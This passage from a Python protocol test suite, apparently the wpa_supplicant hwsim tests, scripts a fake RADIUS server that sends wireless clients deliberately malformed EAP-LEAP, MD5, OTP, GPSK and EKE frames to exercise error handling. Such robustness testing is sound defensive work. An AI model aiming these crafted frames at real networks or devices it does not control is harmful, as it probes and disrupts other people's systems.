                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 8:
            logger.info("Test: Unexpected version in Response")
            return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               0, 0, 8)
        if ctx['num'] == 9:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 10:
            logger.info("Test: Invalid challenge length in Response")
            return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 0)
        if ctx['num'] == 11:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 12:
            logger.info("Test: Truncated challenge in Response")
            return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 24)
        if ctx['num'] == 13:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 14:
            logger.info("Test: Invalid challange value in Response")
            return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0, 0, 0, 0, 0, 0)
        if ctx['num'] == 15:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 16:
            logger.info("Test: Valid challange value in Response")
            # Pre-computed MS-CHAP response matching the fixed all-zero
            # challenge and the password used by the test below.
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        if ctx['num'] == 17:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 18:
            logger.info("Test: Success")
            return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        # hostapd will drop the next frame in the sequence
        if ctx['num'] == 19:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        if ctx['num'] == 20:
            logger.info("Test: Failure")
            return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        return None
    srv = start_radius_server(leap_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration restarts EAP authentication; the handler above
        # advances through its scripted cases one exchange at a time.
        for i in range(0, 12):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            if i == 10:
                logger.info("Wait for additional roundtrip")
                time.sleep(1)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
    """EAP-MD5 protocol tests

    Feed the EAP-MD5 peer a scripted sequence of malformed challenge
    messages (missing payload, zero-length challenge, truncated
    challenge) followed by the shortest possible valid one.
    """
    def md5_handler(ctx, req):
        # Scripted server: choose the canned reply from how many requests
        # have been seen so far; ctx['id'] tracks the EAP identifier.
        logger.info("md5_handler - RX " + req.encode("hex"))
        ctx['num'] = ctx.get('num', 0) + 1
        ctx['id'] = (ctx.get('id', 1) + 1) % 256
        step = ctx['num']
        if step == 1:
            logger.info("Test: Missing payload")
            # EAP header + method type only; no MD5 payload at all
            frame = struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                                4 + 1, EAP_TYPE_MD5)
        elif step == 2:
            logger.info("Test: Zero-length challenge")
            frame = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                                4 + 1 + 1, EAP_TYPE_MD5, 0)
        elif step == 3:
            logger.info("Test: Truncated challenge")
            # Value-Size claims one octet but none follows
            frame = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                                4 + 1 + 1, EAP_TYPE_MD5, 1)
        elif step == 4:
            logger.info("Test: Shortest possible challenge and name")
            frame = struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                                4 + 1 + 3, EAP_TYPE_MD5, 1, 0xaa, ord('n'))
        else:
            frame = None
        return frame

    srv = start_radius_server(md5_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Restart authentication once per scripted case.
        for _ in range(4):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="MD5", identity="user", password="password",
                           wait_connect=False)
            if dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                 timeout=15) is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_otp(dev, apdev):
    """EAP-OTP protocol tests

    Exercise the EAP-OTP peer with an empty request payload, a normal
    challenge, and interactive password entry through the control
    interface (CTRL-REQ-OTP / CTRL-RSP-OTP).
    """
    def otp_handler(ctx, req):
        # Scripted server: ctx['num'] counts requests received so far and
        # selects which canned response to send; ctx['id'] is the EAP id.
        logger.info("otp_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        if ctx['num'] == 1:
            logger.info("Test: Empty payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_OTP)
        if ctx['num'] == 2:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
                               4)
        if ctx['num'] == 3:
            logger.info("Test: Challenge included")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_OTP,
                               ord('A'))
        if ctx['num'] == 4:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
                               4)
        return None
    srv = start_radius_server(otp_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        for i in range(0, 1):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="OTP", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
        # No password configured: the peer must ask for it over the
        # control interface instead.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="OTP", identity="user", wait_connect=False)
        ev = dev[0].wait_event(["CTRL-REQ-OTP"])
        if ev is None:
            raise Exception("Request for password timed out")
        id = ev.split(':')[0].split('-')[-1]
        dev[0].request("CTRL-RSP-OTP-" + id + ":password")
        # wait_event() takes a list of event prefixes; passing a bare
        # string would iterate its characters and match nearly any event,
        # making this success check meaningless.
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"])
        if ev is None:
            raise Exception("Success not reported")
    finally:
        stop_radius_server(srv)
# EAP-GPSK op-codes (RFC 5433)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
    """EAP-GPSK protocol tests

    Run the wpa_supplicant EAP-GPSK peer through a scripted sequence of
    malformed GPSK-1/GPSK-3 messages (truncated fields, missing
    attributes, mismatched RAND/ID/CSuite values, bad MAC) to exercise
    its validation and error paths.
    """
    def gpsk_handler(ctx, req):
        # Scripted server: ctx['num'] counts requests received so far;
        # each "idx += 1; if ctx['num'] == idx" pair below is one step
        # in the scripted sequence. ctx['id'] is the EAP identifier.
        logger.info("gpsk_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_GPSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown opcode")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected GPSK-3")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Too short GPSK-1")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Truncated ID_Server")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Missing RAND_Server")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Missing CSuite_List")
            return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Truncated CSuite_List")
            return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Empty CSuite_List")
            return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Invalid CSuite_List")
            return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 No supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected GPSK-1")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite but too short key")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short GPSK-3")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
            return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 32,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3,
                               0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing RAND_Server")
            # req[14:46] echoes back the RAND_Peer from the peer's GPSK-2
            # so that the RAND_Peer check passes and the next field's
            # validation is reached.
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in RAND_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Truncated ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
            # Offsets shift by one here since the previous GPSK-1 carried
            # a one-octet ID_Server ('A').
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[15:47]
            msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing CSuite_Sel")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing MAC")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHHB",
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Incorrect MAC")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHHB4L",
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
                               0, 0, 0, 0)
            return msg
        return None
    srv = start_radius_server(gpsk_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration restarts EAP authentication; the handler above
        # advances through its scripted cases one exchange at a time.
        for i in range(0, 27):
            if i == 12:
                # Too-short PSK on one iteration — presumably paired with
                # the "Supported CSuite but too short key" case; confirm
                # ordering against the handler script above.
                pw = "short"
            else:
                pw = "abcdefghijklmnop0123456789abcdef"
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="GPSK", identity="user", password=pw,
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
# EAP-EKE exchange codes (RFC 6124)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
    """EAP-EKE protocol tests

    Run the wpa_supplicant EAP-EKE peer through a scripted sequence of
    malformed ID/Commit/Confirm/Failure exchanges (missing or truncated
    fields, unsupported proposals, out-of-order messages) to exercise
    its validation and error paths.
    """
    def eke_handler(ctx, req):
        # Scripted server: ctx['num'] counts requests received so far;
        # each "idx += 1; if ctx['num'] == idx" pair below is one step
        # in the scripted sequence. ctx['id'] is the EAP identifier.
        logger.info("eke_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_EKE)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown exchange")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               2, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 * 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               4, 0,
                               0, 0, 0, 0,
